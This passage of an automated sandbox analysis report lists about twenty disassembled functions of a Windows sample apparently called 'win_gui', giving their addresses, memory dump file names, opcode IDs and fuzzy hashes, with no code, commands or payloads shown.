                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 90ff49d3536b3f486c52f92b3f5527e56271e75145a92056d1ab8e968f3f19af
                                  • Instruction ID: 19031ac8aeec7d642322801a12539d5d5611f6a96e9b9f723631ab096c0dfd9d
                                  • Opcode Fuzzy Hash: 90ff49d3536b3f486c52f92b3f5527e56271e75145a92056d1ab8e968f3f19af
                                  • Instruction Fuzzy Hash: FF6132315093918FD75ACF2C849056AFFE1AB96201F488ADEF8D5DB347C624D909CB72
                                  Function 00615800 Relevance: .2, Instructions: 176COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3c63d82b1cdd2a1dbd4f2555d86054ae7387eb9ca51ff4e30b53a3db3bd70a32
                                  • Instruction ID: f54c3dc80aedb75557d7ef6d7898509d99a89a9ac746548cb2f21dd67924f568
                                  • Opcode Fuzzy Hash: 3c63d82b1cdd2a1dbd4f2555d86054ae7387eb9ca51ff4e30b53a3db3bd70a32
                                  • Instruction Fuzzy Hash: 2871D571A18642AFC398DF39C481A5AF7E1FF8C314F454A2EE55AC7610D731E894DB82
                                  Function 00609370 Relevance: .2, Instructions: 165COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 04c9a7d0eb0b7a56b39627600239559727f4a03c844a130606ad65cf8f2aa4d8
                                  • Instruction ID: 636c421db3e9e60c53bc80b6cc4bd0feea001d70e779806a670faccf34090e32
                                  • Opcode Fuzzy Hash: 04c9a7d0eb0b7a56b39627600239559727f4a03c844a130606ad65cf8f2aa4d8
                                  • Instruction Fuzzy Hash: E751FA7161D3859FC345CF6D888045AFFE1ABE6200F884A6EF4D4D7352C664E919CBA2
                                  Function 00614630 Relevance: .2, Instructions: 163COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 167e1215ede0d836bf9f6ad149efbac4bab79b9d47c141e102c94a849c8c3302
                                  • Instruction ID: eead18798b6bc44da75303f44b76ccc74a3f745470c541961fa95e3701ff72a5
                                  • Opcode Fuzzy Hash: 167e1215ede0d836bf9f6ad149efbac4bab79b9d47c141e102c94a849c8c3302
                                  • Instruction Fuzzy Hash: D6517F716083419FC755CF28C8409ABBBE5BFD9304F48492EF5DA83251DB34EA49CB96
                                  Function 0060E5F0 Relevance: .2, Instructions: 161COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 432031189d57da55505c6a398275fdc6f666abb0bb42ac774b5174f14760181d
                                  • Instruction ID: 973273c329bd359e61186e83a94749adaa15d937507accc151955884320e19b8
                                  • Opcode Fuzzy Hash: 432031189d57da55505c6a398275fdc6f666abb0bb42ac774b5174f14760181d
                                  • Instruction Fuzzy Hash: 9D512D2160D3858FC305CF6D448045EFFE1AFAA200F884AAEF8D4DB343C624DA19C7A2
                                  Function 0060C6A0 Relevance: .2, Instructions: 161COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b51f5817a5a56efbd1d535f81b4dd22389639b2ab16ae069ddbc090a73f4d9a1
                                  • Instruction ID: 60e0520f4e64fac941fddd9dc1886d6632446086e6744e6cec3ee83bd4c502eb
                                  • Opcode Fuzzy Hash: b51f5817a5a56efbd1d535f81b4dd22389639b2ab16ae069ddbc090a73f4d9a1
                                  • Instruction Fuzzy Hash: BF510D2161D3858FC345CF6D449045EFFE1ABEA240F884AAEF8D4DB343C664DA19C7A6
                                  Function 00610990 Relevance: .2, Instructions: 161COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7e1013821f41d91bf7f07709ac856a6b2632052f168dad0ec733a869e8cfd59e
                                  • Instruction ID: e27916e9c4191f379657fcecbf3a11ae6a6a81c5348eabfbd7d5616a7e04a8bb
                                  • Opcode Fuzzy Hash: 7e1013821f41d91bf7f07709ac856a6b2632052f168dad0ec733a869e8cfd59e
                                  • Instruction Fuzzy Hash: A6511F2160D3858FD305CF6D449045EFFE1AFAA240F884AAEF8D4DB343C664DA59C7A6
                                  Function 006086C0 Relevance: .2, Instructions: 160COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4ce9617dd8aea1a96bdd6871724d51bbfd15c037eb01df2b8c429b18309ca228
                                  • Instruction ID: ea8d267c9e99d73321ae85746c4e73a55bcaff512d7cb56152a7b185e44495be
                                  • Opcode Fuzzy Hash: 4ce9617dd8aea1a96bdd6871724d51bbfd15c037eb01df2b8c429b18309ca228
                                  • Instruction Fuzzy Hash: 50511D2160D3858FC345CF6D489055EFFE1AFEA240F884AAEF4D4D7342C664DA19C7A2
                                  Function 0060D3C0 Relevance: .2, Instructions: 159COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9670852d56847e60840d3241f9b4d30d5459fc03d4ed2fdf7b9e65c5f708ae11
                                  • Instruction ID: 5b1ce39f129d87f5762d80d188c2efd1e80aee04bae866876ed6171c0e172705
                                  • Opcode Fuzzy Hash: 9670852d56847e60840d3241f9b4d30d5459fc03d4ed2fdf7b9e65c5f708ae11
                                  • Instruction Fuzzy Hash: A7510D2160D3859FC345CF6D489055EFFE1ABEA240F884A6EF8D4D7342C664DA19C7A2
                                  Function 006603C0 Relevance: .1, Instructions: 149COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5312957fdfb95273e454dac195627dffb40e4a187ead903a8ecde432fe747ad5
                                  • Instruction ID: 2a9cbc2a4c38ab072bc2ea658da1b571afeadf6a0c8cf64813f047142b616194
                                  • Opcode Fuzzy Hash: 5312957fdfb95273e454dac195627dffb40e4a187ead903a8ecde432fe747ad5
                                  • Instruction Fuzzy Hash: BD418DB2B146114BD34CDE2EE81951BB3D2EBC8244F85462CFD92D7781DA30EE22C792
                                  Function 006122C0 Relevance: .1, Instructions: 143COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c495ff72936608dbf684d78731fae049281bdfc00831409c9a10ed5c5d9c9b1f
                                  • Instruction ID: 579dd831385b19bb5753bb512007c764a46c58b271602460ab24d4f98f4c5541
                                  • Opcode Fuzzy Hash: c495ff72936608dbf684d78731fae049281bdfc00831409c9a10ed5c5d9c9b1f
                                  • Instruction Fuzzy Hash: 0951A2316093929FD705CF2D88805AAFBE2EFD6304F4886ADF8D49B306D635D916C7A1
                                  Function 006162E0 Relevance: .1, Instructions: 134COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 62fb37d2f81ccd873a02fcdf326f55b8091d8570eac992c2bd1d5253bccb66b1
                                  • Instruction ID: b8231ffebd996126326eab62040197826811247b5edbaeeaf3ef3b806ad5ecc9
                                  • Opcode Fuzzy Hash: 62fb37d2f81ccd873a02fcdf326f55b8091d8570eac992c2bd1d5253bccb66b1
                                  • Instruction Fuzzy Hash: 324102758197805AD702CB7CC4416CBFBE4AFE7248F08AB1EF084A3213E665E5CD9762
                                  Function 006125D0 Relevance: .1, Instructions: 133COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9c6e686d76d3b9573ab61f0e74d784f0f8fd19b2761d6ed64dbffb04da02c855
                                  • Instruction ID: b9a75a40194abb9a5a3e442606c0925e969ce8bf446328ed9f380861c625fba0
                                  • Opcode Fuzzy Hash: 9c6e686d76d3b9573ab61f0e74d784f0f8fd19b2761d6ed64dbffb04da02c855
                                  • Instruction Fuzzy Hash: E551567190C3818FD711CF28C0916ABFBE1EFDA304F18595EE4D887352D234A94ACB96
                                  Function 005FD110 Relevance: .1, Instructions: 130COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c68b0fa8a79e461c4fe7ca02a2a45ad52fa8294c6c90a7eabaf6291c7099cb61
                                  • Instruction ID: d705c832cd76929057f41fc96d6814ce5c4db47a475bb62f7ddbb72fa59d06ce
                                  • Opcode Fuzzy Hash: c68b0fa8a79e461c4fe7ca02a2a45ad52fa8294c6c90a7eabaf6291c7099cb61
                                  • Instruction Fuzzy Hash: 6831857550430A5BDB31BEB5AC4563BBFFAFF94350F44093EEE4492101EB39D90896A1
                                  Function 006173D0 Relevance: .1, Instructions: 120COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d199e7f460cb947f71329062d2e1880fbd41d43ace80041f2f10419b9e668a92
                                  • Instruction ID: 85ae212969375d5dd68ef7d6f5717f8cde8ce436e64d62f3119c0353b247c909
                                  • Opcode Fuzzy Hash: d199e7f460cb947f71329062d2e1880fbd41d43ace80041f2f10419b9e668a92
                                  • Instruction Fuzzy Hash: E0411D316593458FC304CF6DC88055AFBE1EF99218F4DC6ADE4889B302D276E90BCB96
                                  Function 00611640 Relevance: .1, Instructions: 117COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 56c27273f0a0acaac601094102fb0712765da23c36d884367f0e8ae2bb553344
                                  • Instruction ID: 2697468b6452028f1feef4d6bb825d190e6c407dd8f50228c69289052a7b657b
                                  • Opcode Fuzzy Hash: 56c27273f0a0acaac601094102fb0712765da23c36d884367f0e8ae2bb553344
                                  • Instruction Fuzzy Hash: C2515A305086D08FC7A4DF59EC50676BFA2AB4B30170C995EE6E6472A1C239F626DF50
                                  Function 005FD860 Relevance: .1, Instructions: 116COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c02080602239806853ec544895e4594e1c333f232715c352d32e7f462122f3e9
                                  • Instruction ID: c7d0bbc2420db1f8b08835649b6d68e9254e9b561248e377a61697dce34f2fb5
                                  • Opcode Fuzzy Hash: c02080602239806853ec544895e4594e1c333f232715c352d32e7f462122f3e9
                                  • Instruction Fuzzy Hash: E8414F612192C69FC31E8E6D48805AAFF646F66100B4C86DEECC4EF387C514D6A9C7F6
                                  Function 00622150 Relevance: .1, Instructions: 111COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 792cec11db09a35a6c7ddf654e7c7fe338ab194af9c5202848baf8b86677595e
                                  • Instruction ID: ee70fc6aea59d848dd41e04453c6e8353205549ca69bd08fa0f8a31d08b67eac
                                  • Opcode Fuzzy Hash: 792cec11db09a35a6c7ddf654e7c7fe338ab194af9c5202848baf8b86677595e
                                  • Instruction Fuzzy Hash: AD4184612092D29EC30A8E6D48915A6FF64AF67100B4C86CEE8859F747C114D6A5C7F6
                                  Function 006156B0 Relevance: .1, Instructions: 109COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
